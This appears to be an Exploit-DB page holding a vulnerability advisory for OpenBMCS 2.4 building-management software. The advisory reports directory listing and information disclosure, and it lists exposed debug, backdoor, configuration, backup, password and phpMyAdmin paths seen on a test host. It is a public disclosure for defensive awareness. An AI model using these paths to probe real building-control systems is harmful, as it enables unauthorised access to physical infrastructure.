eb2b6f5cfd
12 changes to exploits/shellcodes WorkTime 10.20 Build 4967 - Unquoted Service Path Archeevo 5.0 - Local File Inclusion Online Resort Management System 1.0 - SQLi (Authenticated) OpenBMCS 2.4 - Cross Site Request Forgery (CSRF) OpenBMCS 2.4 - SQLi (Authenticated) OpenBMCS 2.4 - Create Admin / Remote Privilege Escalation OpenBMCS 2.4 - Server Side Request Forgery (SSRF) (Unauthenticated) OpenBMCS 2.4 - Information Disclosure Simple Chatbot Application 1.0 - Remote Code Execution (RCE) Simple Chatbot Application 1.0 - 'message' Blind SQLi Nyron 1.0 - SQLi (Unauthenticated) Creston Web Interface 1.0.0.2159 - Credential Disclosure
109 lines
No EOL
2 KiB
Text
109 lines
No EOL
2 KiB
Text
# Exploit Title: OpenBMCS 2.4 - Information Disclosure
|
|
# Exploit Author: LiquidWorm
|
|
# Date: 26/10/2021
|
|
|
|
OpenBMCS 2.4 Secrets Disclosure
|
|
|
|
|
|
Vendor: OPEN BMCS
|
|
Product web page: https://www.openbmcs.com
|
|
Affected version: 2.4
|
|
|
|
Summary: Building Management & Controls System (BMCS). No matter what the
|
|
size of your business, the OpenBMCS software has the ability to expand to
|
|
hundreds of controllers. Our product can control and monitor anything from
|
|
a garage door to a complete campus wide network, with everything you need
|
|
on board.
|
|
|
|
Desc: The application allows directory listing and information disclosure of
|
|
some sensitive files that can allow an attacker to leverage the disclosed
|
|
information and gain full BMS access.
|
|
|
|
Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
|
|
Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
|
|
Apache/2.4.41 (Ubuntu)
|
|
Apache/2.4.25 (Debian)
|
|
nginx/1.16.1
|
|
PHP/7.4.3
|
|
PHP/7.0.33-0+deb9u9
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2022-5695
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5695.php
|
|
|
|
|
|
26.10.2021
|
|
|
|
--
|
|
|
|
|
|
https://192.168.1.222/debug/
|
|
|
|
Index of /debug
|
|
|
|
change_password_sqls
|
|
clear_all_watches.php
|
|
controllerlog/
|
|
dash/
|
|
dodgy.php
|
|
fix_out.php
|
|
graphics/
|
|
graphics_diag.php
|
|
graphics_ip_diag/
|
|
jace_info.php
|
|
kits/
|
|
mysession.php
|
|
nuke.php
|
|
obix_test.php
|
|
print_tree.php
|
|
reboot_backdoor.php
|
|
rerunSQLUpdates.php
|
|
reset_alarm_trigger_times.php
|
|
system/
|
|
test_chris_obix.php
|
|
timestamp.php
|
|
tryEmail.php
|
|
trysms.php
|
|
unit_testing/
|
|
userlog/
|
|
|
|
...
|
|
...
|
|
|
|
/cache/
|
|
/classes/
|
|
/config/
|
|
/controllers/
|
|
/core/
|
|
/css/
|
|
/display/
|
|
/fonts/
|
|
/images/
|
|
/js/
|
|
/php/
|
|
/plugins/
|
|
/sounds/
|
|
/temp/
|
|
/tools/
|
|
/core/assets/
|
|
/core/backup/
|
|
/core/crontab/
|
|
/core/font/
|
|
/core/fonts/
|
|
/core/license/
|
|
/core/load/
|
|
/core/logout/
|
|
/core/password/
|
|
/php/audit/
|
|
/php/phpinfo.php
|
|
/php/temp/
|
|
/php/templates/
|
|
/php/test/
|
|
/php/weather/
|
|
/plugins/alarms/
|
|
/tools/phpmyadmin/index.php
|
|
/tools/migrate.php |